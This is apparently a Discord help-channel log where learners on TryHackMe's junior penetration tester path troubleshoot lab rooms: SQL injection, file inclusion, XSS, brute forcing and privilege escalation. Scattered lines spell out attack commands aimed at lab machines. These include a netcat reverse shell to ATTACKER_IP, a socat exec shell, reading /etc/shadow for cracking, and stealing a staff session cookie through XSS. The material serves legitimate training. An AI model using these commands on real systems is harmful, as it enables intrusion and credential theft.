#junior-pentester-path
am i doing something wrong? i finished the other tasks in the Blind SQLi room, but not step 6, so that room is now my first room that does not complete
in the login form, i got "You bypassed the login and can now move to the next level", so that looked good, but the flag presented when entered gives me computer says no
try to type in the flag I also had an error when i pasted the flag
Anyone in Privilege Escalation Room?
I also feel the same. Started 20 days ago but i believe consistency is the key!
Exactly, keep it going! But don't forget to stretch a bit, knowledge is important but health is more. Don't overdo it, could lead to burnout. That's all, feel free to dm if you want
Which privilege escalation room is this?
Have you checked if there are extra spaces in the flag you copied?
Linux one
I think i need help with Windows AD. It's not letting me Remote Desktop Connect. Saying that the connection is conflicting with another connection?
keep getting this error:
The remote desktop server has closed the connection because it conflicts with another connection. Please try again later.
Which room ?
I was doing Windows AD. But i figured it out from the instructions. Since I ran the machine in my browser and I'm on linux. I didn't nor couldn't run RDP to connect. It was optional
Thanks for the assist though
the what the shell room is NOT 45 mins
reading alone took me an hour to digest
My advice is to ignore that timer, it's useless. Don't pay attention to it at all
yeah I knew that from a long time ago but setting it up as 45 mins is super funny to me haha
i am doing the room What the shell? I am experimenting with socat and when i set up the bind shell i have a connection like "0;@ip-10-10-23-94:~7;file://ip-10-10-23-94/root" why could it be? i connect to shell like this: socat TCP:10.10.120.15:4444 EXEC:"bash -li"
Hello guys, can anyone here help me with one question or better said help me get "unstuck"?
I am working on the optional challenge in the Upload Vulnerabilities room. (The jewel website)
I remove client-side checks for file upload, I've downloaded nodeJS reverse shell and adjusted its content to my port number 4444 and IP address, I have avoided the server-side check by MIME; uploading reverse shell as .jpg successfully. Enumerating /content directory with gobuster I can see that now there is additional jpg image, which is my reverse shell. However, when I try to trigger it from /admin page by doing ../content/<imageName>.jpg it doesn't trigger the listener on 4444 port. I just get an error message "module does not exist". Am I missing something?
Hello Guys, I'm currently on the content discovery room. Task 6
I think that this URL: https://static-labs.tryhackme.cloud/sites/thm-web-framework is already dead?
Hey friends,
I'm stuck on Task 12 of the Burp Suite Intruder room (https://tryhackme.com/room/burpsuiteintruder?taskNo=12).
I understand the steps needed (macro for session + CSRF token, Pitchfork attack, etc.), but I can't actually complete the brute-force because Burp Suite gets extremely heavy on memory and becomes unresponsive during the attack.
Has anyone found an efficient workaround for running this attack with such a large wordlist without crashing Burp?
Hi guys, I just completed the Jnr pen tester path. I wanted to know if there's anyone here who has taken the PT1 CERT EXAM?
Check out #pt1 exam
hey, i am new here, i just finished the JR pentester path, is there any suggestion of rooms and challenges that i can practise my skills on? i would love to have a list of 20 rooms for example that are easy to begin with
Try this one
https://tryhackme.com/room/smol
thanks!
Hello, I wanted to know if it's normal that I find the lateral movement and pivoting room extremely difficult even though it's supposed to be an easy room.
THM has a criteria on how to classify rooms in terms of difficulty. While that is 'standard', you may not have the needed background or requisite knowledge for the room.
Yeah it is a bit of advanced topic
can someone help me ?
smbclient doesn't work
for the room lateral movement and pivoting
Based on the error though, it doesn't seem to be an smbclient error?
Yes i saw that, but i dont understand why it doesn't work
I just followed thm room instructions
Looking at the error alone, it seems to be an incorrect password
But the password is correct
@worthy tide yo
what's the issue ?
Hello I was on vulnerability 101 Task 4:
Using NVD, how many CVEs were published in July 2021?
Since i am not able to find full listing page on nvd and also since it is down i used wayback machine where the ans is 1585 but thm shows it as wrong ans can someone help
Which query did you use on NVD ?
on the curr nvd site i could not find the full listing option
So i went to wayback machine and got the old nvd page that had the full listing page and in that i went on 2021 july
.
Can you provide a screenshot please ?
That number still includes rejected CVEs.. you should unselect those in your filter.
You may wish to verify your account and post images instead (as folks won't simply click on links from random folks from the internet).
Hey I'm looking for a mentor or someone to go through this with as I feel I learnt better with someone than by myself, can send me a message, I'm a noob trying to learn
i cant wrap my head around linux Privilege Escalation. I dont know what to do most times. Task 6 was the only one so far i could understand. But kernel and SUID i dont get it.
How you guys learn this stuff ?
What causes the confusion?
it was multiple things tbh.
I was executing the GTFObins wrong. I didn't understand what bitsets means in the right context and how it's connected with
"find / -type f -perm -04000 -ls 2>/dev/null" command.
But yesterday at work i watched 2 youtube videos that were explaining these things at a very core level. And it made it click finally.
Now i understand what the command does and shows me and how to properly use gtfobins and finished the labs
Just getting started, does the training path prep you enough to pass the cert or is additional training recommended ?
Is this a PT1 related question? If it is, suggest to post it on #pt1 for better traction.
Is this the correct training path for PT1?
Room called: What the shell, task 13 Q6/7
Hey guys is there a way to do this task, i cant get the powershell, i mean i can connect but when i type commands i dont get any answer
Which powershell reverse shell payload are you using?
Php Reverse shell modified, I changed the uname to make a power shell
And I can connect, but after I use a command I don't get any response
Got confused there. I thought you need to connect via PowerShell?
Same here onward to task 6 or 7 i took the help of writeups
does anyone know a good youtube channel walking through this path? not the ones that just show the solutions, i mean the ones that actually explain the stuff?
"The $ in SMB/CIFS URIs means that the share is hidden, and won't be displayed when browsing shared folders"
so why can I view the share names when running
smbclient -N -L //10.129.34.168
Check out @coarse pebble, he has some great content
Can you provide a shot please?
Hello, in the file inclusion room, challenge 3, we are to change the http request from get to post in order to bypass the string filtering. I see on online writeups that people use curl. I do the exact same using burp but it never works. The include function shows: include(.php).
Anyone has any idea why burp doesn't work?
How are you changing request method in Burp ?
Repeater > Inspector > Request Attribute > Method
Hello, can you suggest any additional "beginner friendly" labs where I can practice what I learned on the jpt path? I'm trying to combine THM and portswigger, do you have other suggestions? Thank you in advance
Check this one
Can you please verify and provide some shots ?
```
Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
sambashare      Disk      test SMB v3.1
IPC$            IPC       IPC Service (Test SMB server (Samba, Ubuntu))
```
Anonymous login is probably allowed that's why you can list shares
Hi I hope that you're fine
Please guys is the jpt free ?
Majority is but not the whole path
Does the jrpt cert include more training or just being an exam ?
For a cert. advice try to ask in #cyber-and-careers channel . This channel isn't as active as much
has anyone solved Vuln Capstone room?
I have downloaded the script but cannot execute RCE
Pls help meee, thanksss
Can you provide some shots please ?
i dont know how to use this exploit script
i dont understand the word "Vulnerability", what should i provide for that argument
ahh, i got it, tks
remove fuel from the cmd
Is this path enough to try PT1 ?
Sry read the reply too late, hope you getting better at it. I'm on windows priv escalation right now. How far u progressed so far ?
No , go on the link below and click on Recommended Learning to find the full learning path for PT1 , you also need a lot of practice
M done with tha
Thank you
Gave +1 Rep to @violet brook (current: #1 - 5922)
And made it click for you? Or still need help on that topic?
I took help to understand
didn't rely only on THM --- To complete that task i went over AI too
yeah same after 2 days in this module i watched a video of someone explaining priv escalation for dummies and then it clicked for me
Hello everybody
Any merciful soul that could help me in a osint situation please? Still learning a bunch of stuff but I could really use some help
shoot, what's your question?
@soft yew mind if i send you a dm mate?
dont want to pollute the chat with a bunch of questions
well, that's what the chat is all about. Kinda
What's the issue ?
Ok ill explain
Im finishing my course on cybersecurity and the final project consists in finding public information about the school
The teacher told us to use a bunch of websites and whatever tools we want to use
The problem is that I cant find some stuff that he is asking in the project like public emails or documents like pdfs or .doc .xls
I already found ip addresses domains subdomains server software etc etc
I already use a couple of transforms from maltego
And other Kali Linux tools
Sorry can you explain better please?
Is that like Google dorks?
Yes
Yes I already use it
And the only thing I can find is a simple pdf file
My question is like: is there any other tool that could be more accurate? I dont know like... a specific tool?
You can find some on github
We can't help you with school work #rules
@hollow marsh were you able to complete it? It keeps DOSing on me as well.
Ok... it doesnt make sense to me but thank you anyway
Gave +1 Rep to @violet brook (current: #1 - 5928)
Yeeeeah 
2 Month of daily grind
Congratulationss buddy
Gz mate!
Thanks ❤️
The grind never stops
How was the exam? Like what style was it?
Great job, keep up the good work
Which exam ?
the PT1 exam?
hi im doing jr pentesting path and my attack box server is very far so ping is very bad i want to setup that lab in my pc as vm i have a fine spec pc 32 gig ram r5 5500 and gtx 1060 good enough for labs so i want someone to help me with it please cuz im really new to all this
i am in india fyi so .... yea i would love to have a meet or a call to help with setup
i already have kali , ubuntu and a wazuh vm ready
the screenshot is not from PT1 exam, it's the finish of the path Jr. Penetration Tester.
This isn't a PT1 channel, if you're interested in pt1 check out #pt1
hi can i know how to change this region to something else cause my attack box very laggy, i already tried to change it in my "access" with EU-VIP but it doesn't affect anything
Server Region is under Profile > Manage Account > Account Details (https://tryhackme.com/manage-account/account-details)
after selecting a different choice, Save Changes button turns from greyed out to green
I see
please tell here if things improve after changing your Server Region, that would help
thanks
Gave +1 Rep to @hexed creek (current: #3157 - 1)
woo tbh it's much better even though it's kinda laggy but still much better than before, thanks for the suggestions
Gave +1 Rep to @weary mesa (current: #13 - 798)
you went from US-East to Europe, I guess?
hello i am doing the linux privilege escalation room in that the Task 11 I am getting this error when i am trying to run the compiled c code
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)
@violet brook
check this (issue 2): #1377021985795870810 message
okay thank you
Gave +1 Rep to @weary mesa (current: #13 - 824)
I am new using tryhackme how to step step with deep knowledge of everything how to get how to study how to get this
Pre security. Your best bet is to pay for subscription. Because it's a very detailed description on everything. You're not gonna jump right into it and know everything. You gotta start from the very bottom. But pre security is your best bet. And well organized. Have fun!
Check out this article
hey guys, i wanna ask if i connect to my openvpn for exp EU-vip then my attackbox region is EU server does it have an impact on it such as no laggy ?
I would expect so
however, what matters in the end is how you experience it
About the Server Region, I have seen several users complaining that had a better experience after switching from "US-East (Virginia)" to "Europe (Ireland)"
When should I start this path?
I just started TryHackMe about two days ago and have gone through almost the whole pre-security pathway. (With free version)
I have no to little experience with cyber security/hacking.
You should finish Cyber101 path before this one
Ok thank you
Gave +1 Rep to @violet brook (current: #1 - 5947)
Is Cisco Ethical hacking course worth it?
Why not?
its not
why
.
Thank you for letting me know.
Do you recommend me any ethical hacking course as a beginner?
I thought about eJPT
Gave +1 Rep to @ornate pike (current: #3172 - 1)
I would recommend TryHackMe
Hey guys I am newbie in this field (have zero knowledge in IT) and I want to change career in ethical hacking how should I begin.
have a look at THM roadmap: https://tryhackme.com/hacktivities?tab=roadmap
look at the thm roadmap, start with pre security then cyber security 101
its all in there
Linux and Windows Privilege Escalation has been the worst experience I have dealt with EVER
tbqh I have restarted the windows one having felt like i missed the point
Are you referring to the Tib3rius rooms?
Task 6 virtual hosts of subdomain Enumeration is giving me problems. I'm having no luck and been stuck on this lab for a while. I followed the instructions but still don't get the subdomain names. Any step by step? I'm not sure what I'm doing wrong
Agreed. This is the one I'm stuck on because the Windows machine simply won't launch.
My attack box does but the wprivesc2_v1.1 doesn't appear at all. I tried two browsers, cleared cache, relogged..nothing helps.
It's like my last one for this path too so quite annoying. Had to go through the whole part 3-5 with a weird bug where it was constantly right clicking on its own and I had to alt tab constantly to fix it..
for the target VM, have you used RDP to connect to the target, as a workaround?
that weird bug, is that a paste popup window appearing all the time? if so, please check this past message: #site-support message
I've tried but it asks for a domain name with remmina and I'm not sure how to find that but I will try again
Maybe I'm doing it incorrectly
Oh thank you! Yes it was!
Gave +1 Rep to @weary mesa (current: #9 - 973)
in my experience, no need for a domain, just enter the IP
as per screenshot
Thank you! Appreciate it 
Gave +1 Rep to @weary mesa (current: #9 - 974)
Hi all. I've come across a really annoying bug in the "Walking an application" room. When I try to enter the flag for the fifth and final task, it keeps automatically inserting an underscore in the wrong place so I can't successfully submit. Doesn't matter if I manually type the flag or try to copy/paste. Anyone come across this before? I've tried switching browsers and logging out/logging back in to no avail.
Not even refreshing the browser worked?
Nope. It's weird. I'm on an Ubuntu laptop. Maybe I need to try my Windows machine.
yea im having the same issue
hello. in the https://tryhackme.com/room/passiverecon room at task no 6 this question : Based on Shodan.io, what is the 3rd most common port used for nginx? requires the answer 5001. but the current 3rd most common port, that if my way of telling that is not wrong, is 888.
@modest arch @winged lotus it may be the wrong flag also
you are welcome to share it here, but avoid spoiling by inserting it inside double pipes like this || secret flag ||
that is an issue with data that is dynamic
you may want to add your contribution to the bug report about this: #1358767203830333592 message
try googling the room name but at the top select "videos" or just go to youtube & search for your room name & look for one of the longer videos (use right click so you can check out several) & find one that sections the work by Task #1 - some explain really well, but some just zip through, so find one that explains & follow along & likely see where you stepped off the beaten path.
The last task in that room is Task 6 is that what you are referring to? If so, it's not a bug - you are not done - the one you found is a red herring. Keep going & follow all the steps.
THM VM is all on their site - how you access it makes no difference except for maybe speed/latency.
Is the flag not || THM{HEADER_FLAG} || ?
Yes I meant to refer to Task 6. I shared what looks to be the flag in my last message to @weary mesa.
that is not the flag THM wants I suggest you check the Hint
Wassup
What's up everybody! Totally new here and posting because I'm getting pretty frustrated. I'm on Local File Inclusion, Task 4, and I'm really confused as to how I'm supposed to get to the answer. I've got the Attackbox on, I've entered in the filename that I'm looking for in their search bar, but the output is nothing like what the answer is looking for. What exactly am I supposed to do?
Ask echo
Well after almost what felt like an eternity I have just managed to successfully complete the Junior Pen-tester Path. It was soooo difficult but very informative and well worth the hard work. I have enjoyed every minute. It must have taken me closer to 60 hours to complete rather than the stated average of 30 hours, but the time just flew by really quickly.
congrats, nice job 🥳
What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task. - I don't seem to understand this question. Is there a user called 'penny'?
correct.
Hi people
In the vulnerability 101 room task 4 they are asking for number of cves published in july 2021 on nvd plat but even if i put the right number thats 1585 its not working i finished the room but this task is blocking me
When putting the filter on the date, you get 1585, there is another filter you need to add to get the correct number
Click through the different categories when modifying the filter, it will be obvious when you see the option
In Authentication bypass room, i am getting all error while brute forcing. did this happen to anyone else or am I making a mistake?
Have you checked this?
Note: If you created your valid_usernames file by piping the output from ffuf directly you may have difficulty with this task. Clean your data, or copy just the names into a new file.
I made it manually in the directory and also again from the terminal yet its giving all error. i have tried almost 3/4 times
can you copy paste your command here?
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200 copied this command and paste exactly, i think its having problem in the username file but i checked that yet its all giving error.
is the machine still up and running? Do you see machine information at the top of the page? if not, start the machine in task 1
yeah while doing the room machine was running. i checked the url, can't understand where's the problem
Change machine_IP with the IP of the room:
http://machine_ip/customers/login
well i did this, machine is not running rn thats why its showing machine ip but when i did then there was ip. its not the issue.
and check the location of the password file, if this is correct on your machine
the password file was in the root directory and so the username file. i have watched some videos also but even doing exact same mine is not working, it's testing but showing all error
Did the room again until brute force, had to change the password file location, after that it works.
I think it's the SecLists in the path that's giving the issue
try with this(but check if file path is the same on your machine): /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt
okay. Thanks btw
Happy to help and good luck!
hello, i am doing the Windows Privilege Escalation - junior. and on task 4 i need to use this command in powershell. C:> echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat i get an error. i watched a walkthrough video on youtube, i can't see any mistakes on my part. where can i get help?
i tried putting this "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444" between comma as perplexity and chatgpt said, but while the command works, i get nothing on the listener
To confirm, the nc executable you are using came from where? Also, have you checked that you are using the correct version? If I recall it correctly, there is only one version of nc that accepts the -e parameter
From the vm ... I didn't upload anything. And the listener i opened was on the attackthebox. I didn't use rdp or ssh for this exercise.
i found out my mistake.... the command should have been run in cmd not powershell
Didn't find an instance where it said this, but only there works
Are there other TryHackMe rooms like https://tryhackme.com/room/lofi
Hi guys. Please help me i'm stuck on this task since 1 week
The two last flags
Idk how to find the flag
I've viewed the page source codes but i still haven't found the flags
Nobody wants to help me?
the privileges escalations is rough
Please be patient as folks here are mostly volunteers.
Okay thanks
Gave +1 Rep to @hollow venture (current: #3244 - 1)
Oh ok
guys in the privileges escalation room task 7 we have to look for a way to read /etc/shadow and /etc/passwd in the thm example they used nano but we cant do same because there is no nano file when we look for it by doing find / -type f -perm -04000 -ls 2>/dev/null but i searched for the solution and ive found that they used base64 that have a s bit set and we can exploit that by using gtfobins ok but i cant i dont understand how to do it i cant use sudo the user isnt a sudoer so i cant use nano too i dont know how to do that furthermore the example they give us on thm was not that accurate let me know if i missed something
with base64 having the SUID bit, gtfobins tells you how you can read a file like /etc/shadow
why?
bcs i dont ahve any permission
ive seen that someone in the walkthrough put the hash in a file called literally hash and then used it to crack it with john the ripper
id even know if i can use john
i missed something maybe but i dont think
@weary mesa that's why
/etc/shadow contains password hashes, try to crack them, with the goal of moving from user karen to another user
@weary mesa i just dont know how to do it if i cant use any tool
the "Cyber Security 101" learning path has a module that covers that, in particular the room for John the Ripper, as per screenshot
if you do not have that expertise, use google/chatGPT/whatever so you can do online cracking
if you are stuck, use the following hint: || here is a resource for online cracking: hashes.com ||
Can anyone help me, I have completed the authentication bypass (Jr. Pentester) room in try hack but I completed that in the lab but how to test it in the real website using ffuf tool, please anyone help me
@weary mesa i have the hashes but i cant put them in any files to use john how am supposed to crack it lol
you use john on your attackbox, i. e. your own local machine or the in-browser attacking machine provided by THM
you do not run john in the target VM
john is one of these tools you carry along in your hacking toolbox
Ure right ty
Hey I have some questions about a topic I didn't fully understand in the
authentication bypass
Task 4 - logic flow
If anyone can help me understand
I'll try to elaborate maybe it will help with the answers
In the task 4 it says the author understands he needs to send curl with the right string to somewhat inject to the php?
So I'm not familiar with php or with how he got to that
It's pretty simple watching what he did as an answer but I want to understand the path he took to know what to do there
hello guys i wonder if the jr pen tester certificate has an expiration date
Yes, it is valid for three years after which it needs to be renewed
https://tryhackme.com/certification/junior-penetration-tester (see FAQ section)
alr ty
Learning a lot with THM, probs will do this path next.. my question is "is this cert actually good for anything?".. I wasn't expecting it to be and am doing it out of personal interest, but I figured at most I'd put it as a post on LinkedIn..
Like I said at most, but curious other people's exp
might be some discussion about that in #pt1
Who got time for that?
i am just 3 rooms from completing this room
Hi I am Naruto Uzumaki ... I would like to ask something... Is this junior-pentester path even worth it.....
What are ur personal experiences
Probably for your skill level, but not for recognition.. THM is a 7/10 learning platform but the certs don't mean anything to employers
ohh
I'm on a 26 day streak and just started the JPT path. I'm also studying the network and security+ simultaneously. I like the training platform but I get it doesn't mean much to employers.
I think it's the certs that don't mean much and our system revolves around pieces of paper. Get your certs that mean something, but what you learn in THM will mean something as well.. but you need to get to the place where you have the chance to "show what you know"..
Every path has its struggle, pick yours. You could be the kid who scratches and claws for his degree to mean something and scathed his way through a 4yrs bachelors (more common than you know)... then fails the skills portion and finds getting employed hard because of it.
Then he finds himself needing to circle back and get certified because of it, in spite of having a degree.
If no degree, networking means something way more, and that doesn't mean "playing fake" and shaking hands at coffee hours, you should be attending clubs, hackathons, open source projects and conferences like your life depends on it.. don't be pushy, but these are open to the public spaces where you have a chance to "show what you know"
Some of the people you meet there will be in a position to extend offers or communicate with people who can.. if you are who you need to be at that time. If you keep building your skills you'll reach a point where people are surprised you're not employed in the field, or not in this position.. then when opportunities arise your name will be one of the first to come up.
Most of all don't become jaded because what you think you "deserve" doesn't fall in your lap (not saying you are but it's common).. people with zero experience join this field because they think it's an easy six figures, if you're truly passionate about the subject the first few years of leg work shouldn't mean much (of course it sucks)... but your interest should get you through that portion...
I honestly think the field becoming oversaturated is a good thing in a round about way, it will drive out the people looking for easy paychecks with a paid yoga hour. And good because those are the people who skate the second they find a place to do so.
It's not what you can do in 3 months that counts, it's what you can sustain for years on end and still be enthusiastic about.
Or somehow ascend to upper management and don't have a clue what they're talking about, thus making life harder for everyone else for reasons that literally make no sense or are counterproductive.
Thank you, thats very insightful. Im actually working on network, security, and then pen test+ and using THM as a practice/learning room.
Also in the process of setting up VMs to practice on when im ready.
how can i enable copy/paste from my host machine to tryhack me machine
The directions of burpsuite intruder on last task is a puzzle to me luckily there is AI but it could be easier to understand.
Anyone suggest what I do for pentester internship
That's a first there is pentest internship?
And here I thought all jobs for pentesting is at least 2+ years experience,
Are you using the Attackbox or your local VM as an attack machine?
You may want to head over to #cyber-and-careers and folk there might be able to point you to the right direction
Hello friends, I'm wondering how hard can PT1 cert be if attempted right after finishing Jr Penetration Tester path. Is it doable, or it escalates too much in difficulty?
Hello Guys,
Under the jr pentester path I'm currently doing the File inclusion module (Jr Penetration Tester -> Introduction to Web Hacking -> File Inclusion)
The last section of this module is challenges, which I'm unable to figure out without referring to walkthroughs on medium. What is that I could be doing wrong and how can i bridge this skill gap?
More than likely just exposure and repetition, unless you did the "intro to cyber" path, a lot of these concepts are going to be your first introduction to them.. expecting one or yourself to be able to accomplish each task flawlessly after a simple read through is not necessarily realistic
Can download your own VMs set up and attacker and target and attacker box and run reps
Just see everything as exposure to the material until you finish JR then go back and rep what you didn't retain.. nothing wrong with walkthroughs as long as you use it to identify what you don't know and go practice it until you know it
In the grand scheme of things even if/when you pass PT1 if you decide to go that route, you'll still be at a "have been exposed to the material" level and not much more.. unless you decide to do more practice in your own time.. I'm basing that off of the pathway THM provides alone.
I had to consult a walkthrough for Linux Priv Escal and the dude who makes the walkthrough is a professional in the field, and he was getting frustrated.. albeit he doesn't edit out his mistakes and solves them in real-time which most walkthroughs don't provide..
Thank You @tranquil compass - Appreciate your feedback... it makes sense... Yes I'll be aiming for the PT1 in the coming year....i plan to do the all the recommended materials that was highlighted in PT1 learning resources in addition to the Jr Pen tester path. Thank you once again.
Gave +1 Rep to @tranquil compass (current: #3307 - 1)
Hey! I am facing some issue with Bypassing UAC room so when i start the machine it's constantly "reconnecting with remote machine" it says, so i terminate it and start again and again 3 to 5 times but same issue and I'm unable to rdp it through my vm and also with attackbox and in the end i got this...
Please help me what's going on is it my mess or something else.
Thanks
Hi,
I shared a new post on my TryHackMe learning progress.
hey guys i have a question. I'm doing the linux privilege escalation room and for some reason on Task 5 whenever i try to use wget to grab the exploit file from my python http-server it tells me that write permission is denied
wondering if anyone would be willing to help me
I would imagine you need to change write permissions on the file, do you know the command?
yeah I figured it out thank you! @radiant gale
nice
wowowowow..
How was this solved, guys?
I went through that yesterday, and I didn't experience any problems
I am experiencing the exact same problem as this one @ornate flame but I think it's my own cookie my netcat listener grabs...
After firing up the listener, and grabbing the cookie in that request, did you not just decode it and submit as answer??? @ornate flame
I'll have a look in an hour, on the road rn
Its with the staff session cookie right?
Yeah. I decode the cookie I grabbed from the listener, and submit that as answer. But get a lot of errors, including incorrect answer and expected answer format is different.
Only include the last part
Don't include the staff session bit
cookie=eggh6755fghj886xxcvh76543edg
I decode the value, and I get something like:
session=efoow9873yeghs9277shs
I submit only the value, but get the error..
The exact error is:
`Uh-oh! The answer you provided may not be in English. Please review it and try again..`
On other instances, I just get incorrect answer as the error message.
@ornate flame
what steps did you take to get that cookie, because it is most definitely not correct
Okay so.
You should get something like this from the netcat listener.
cookie=dGhpcyBpcyBhIHJhbmRvbSBiYXNlNjQgc3RyaW5n
(not the actual cookie)
which you then need to decode (base64)
then you get:
staff-session=4CD305E55956197690F02D6G8FD2A321
(not the actual session token)
then you need to put 4CD305E55956197690F02D6G8FD2A321 into the thm question.
When i decode what I get, I get session=hsjsj3837eyehjs9s8h
and not staff-session= 2388shdnks99wjssbhskw98
The moment I submit the payload into the field for the ticket creation, I get a response on the netcat listener... I don't think that should be the case. I should get a listener connection when an admin views the created ticket instead, right??? @ornate flame
I fire up the netcat listener as instructed, and then I used the payload in the input field of the create ticket button. Upon clicking on create ticket, there is a cookie captured in the listener already. (This cookie likely belongs to the same logged-in user I created at the beginning of the task)
that cookie must be ignored.
You need to put the xss line into the field when you create the ticket
once that's done
click on the ticket ID
and you should get the results in the terminal where you ran the nc command
Hi, I'm having this same issue. I tried changing the perms - but it's still happening. Can you advise how you resolved?
Anyone solved challenge 3 in file inclusion room? I got stuck
Hello guys, I am new to TryHackMe. I started my journey in nov. And i am super excited to become a pentester. I know it's gonna be hard and it will take time, and I am ready. Right now, I know Linux (basic, ofc), and some basic things here and other. NGL when I used Wireshark and Metasploit, i was sooooo happy, and when i solved some questions all alone, that feeling dayum better than playing Valorant. I hope all newcomers like me enjoy, and I request my seniors to help us noobies.
@modern monolith im doing the same but I'm on network on the 101 path
looking forward..........
Nice bro, same here looking forward. 
I want to retake my finished junior path again. How can I do it?
Reset each room one by one, or create a new account.
i been thinking bout doing this also. my memory sometimes is like a gold fish haha
#Script kiddie
Don't forget to take notes as you work on rooms.
Almost 90% through this path and I plan to complete it within the next few days. Also, Burp Suite is very [emoji].
Do check Caido and OWASP Zap as alternatives
I am now officially on this path and i figure it will take me at least 5 to 6 months to complete considering the recent cybersecurity 101 took me 4 months to complete. I take my time i am in a hurry but i also for the sake of my mental health dont want to burn myself out. Cramming everything in a matter of days and endless hours to me is very unproductive these days its more focus and discipline and focus on completing one module at a time rather than speed running through all of it. But that is just me.
Gotcha, will do!

I am doing task 3 in the Nmap Live Host Discovery Room. I cannot find the Start Machine button for some strange reason. There is only one button for the static site in Task 2
There's a start attackbox button below the room title, in the page header
I am looking for the button to start the Start Machine button to start my target ip.
You dont really need a target machine to answer these questions
Thanks. I just checked again.
Doing the nmap advanced scanning room. I am trying to do an Ack scan but the results arent showing anything.
I have tried using sudo nmap -sA <Target IP>
I also tried sudo nmap --scanflags ACK <Target IP> but no ports are showing up. I have also reset the machine multiple times to no avail
have you tried with -p- to scan for all ports maybe its not within the default ports that nmap scans for
Okay I will try to do so. Thank you
Gave +1 Rep to @craggy pilot (current: #3476 - 1)
It says all ports are unfiltered which is not right
it was a guess from my part what you could try.
its okay let me take a break and try again later. Could be a connection problem
Why do you think it's not right?
TCP ACK scan is only useful for finding out whether a firewall is blocking certain ports or not. So, ports are going to show as filtered or unfiltered. Filtered means the ACK didn't receive a response as it was blocked by a firewall. Unfiltered means the ACK reached the target port and a RST was received. So, it wasn't filtered by a f/w. An unsolicited ACK always results in a RST (reset) regardless of whether or not a service is actually running on that port. This is why a TCP ACK scan is only useful for figuring out firewall rules and not for finding out actual target port or service state.
It eventually worked. I am not sure why the scan was not completing. It would say all ports are filtered. I had issues with scans not completing in that particular room and had to restart my machines a lot
Why do I not see the flag here:
Did you finally succeed?
Cause I am also stuck there i don't seem to find the flag
Keep going mate you are gonna figure it out, I already did
Can I then have a hint ???
One of the headers in your packet has an incorrect value. I think you might have been over-editing the packet?
hmm, I only changed the get to POST
And added the content-type one
So one of those two must be it
now experimenting which one because right now I do not have a idea
@daring cradle
and added the file line
You know that if you right-click on the request packet in repeater you can choose "change request method" and it will change it to POST for you. So, there's really not much manual editing necessary here.
absolutely
oke
will try that way
right now I changed the method in the proxy
Are you South African or Dutch?
Your name almost looked like Dutch words
@daring cradle
Belgium
aha, im from East Netherlands
will try it after the sqlmap is ready
is very very slow in attackbox
gtg and eat
gtg ??
enjoy the meal
@daring cradle still no flag
Content-Type is correct now, but your POST url is now wrong (previously it was correct).
I tried that one too but then got a 404
Will try tomorrow again. It is now time to sleep
just finished this whole path
@daring cradle still no luck
oke
An error:
<br />
<b>Warning</b>: include() [<a href='function.include'>function.include</a>]: Failed opening '/etc/flag1' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in <b>/var/www/html/lab1.php</b> on line <b>26</b><br />
Your POST url is almost correct
If you want I can tell you how to do it in Burp, because I think you are editing more than should be necessary
is one of the problems that before the challenges part must be a / ?
yes the leading / is missing
I try it the whole time in Burp
oke, I started up attackbox to try
but the /etc/flag1 must that now be in the URL
or as last in the request
and I do not change it
If burp changes the method the challenges part disappear
Just browse to the page and enter "/etc/flag1" and click include. Then find the request in Burp and send it to repeater, then in repeater right click in the request and select "change request method", then send it
oke
like this you dont need to do any editing
oke
burp is now starting on the attackbox
oke, now changing the method
and the first flag
Finally
now thinking how and where I can change cookies
for flag2
some thinking to do
Change the cookie to administrator but then I see a message "welcome administrator" but also a warning
time for a break
I'm stuck on the final challenge (RFI/RCE) for File Inclusion: https://tryhackme.com/room/fileinc
I think I understand generally what I could do - host a malicious file with ngrok and coerce the app to include it - but as far as I can tell, the target VM has no connectivity to any other hosts, so I can't get it to include anything even with HTTP. Am I missing something? This seems like a huge leap from anything I've been asked to do on this path so far
I am finally on this pathway. I hope to complete this by the summer and take the PT1 since the cybersecurity 101 path took me 4 months to complete. Unlike most I don't rush, I take my time, and besides, cramming everything as fast as possible doesn't help.
And don't forget to take notes of what you did or learned on each room.
I know i go slow not in a rush.
Why ngrok? You can just use a simple python http server.
python3 -m http.server 80
Currently studying the Advanced SQLi Room but I can't access the website MACHINE_IP/second/add.php (and yes I started the machine and used the IP address for the target provided), did it twice on the AttackBox, same issue.
Am i doing something wrong? Or is it a THM issue
I used both; Python http to host the files and ngrok to expose it to the Internet so the target machine could access it. If I only used a server, I'm not sure how to make it accessible to a remote host from my Kali VM VPN'd to THM
got a little nerd-sniped and tried a couple more things this morning, like using my VPN IP (10.x.x.x) directly as the hostname. But no matter what, the playground times out trying to include it and show an empty file preview, even if I can access the exact same URL through my browser.
With one exception: if I put a URL for the target machine itself, it can access that. It just really seems like it's locked down to be unable to access any remote hosts, which completely defeats the purpose of demonstrating RFI
Hmm, using the VPN ip should've made it work. Idk, maybe the way you're doing RFI might be wrong, or the lab has some kinda problems.
May I have a hint on File Inclusion Task 8 question 2
Where i have to find flag2
I have changed the cookie to admin
But where do I put the request for the file ?
Hi,
I can't use burp's browser or the foxyproxy burp, i only have the GET request and the site never loads. The machine IP is working fine on firefox (i'm on the race condition room, i can connect with the 2 users on the website), but everytime i try to connect with burp, i can't. I'm on the THM virtual machine, the certificate is installed, and the proxy parameters are okay. What can i do ?
Thanks
I've already restarted burp, the attack box, the attack IP, firefox, etc
Next time I'm at it I guess I can try the AttackBox
After you have changed the cookie to admin and loaded the page there is a hint on the page...
yes, snow white
Mock site for SSRF room no longer has the Avatars for the final ssrf directory traversal
what is the ip for the acme site
nevermind
im trying to take a screenshot but it wont work
im on subdomain enumeration, task 6 virtual hosts
the command is
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP
the thing is, what is the machine ip
because this room doesnt have any machine i can start
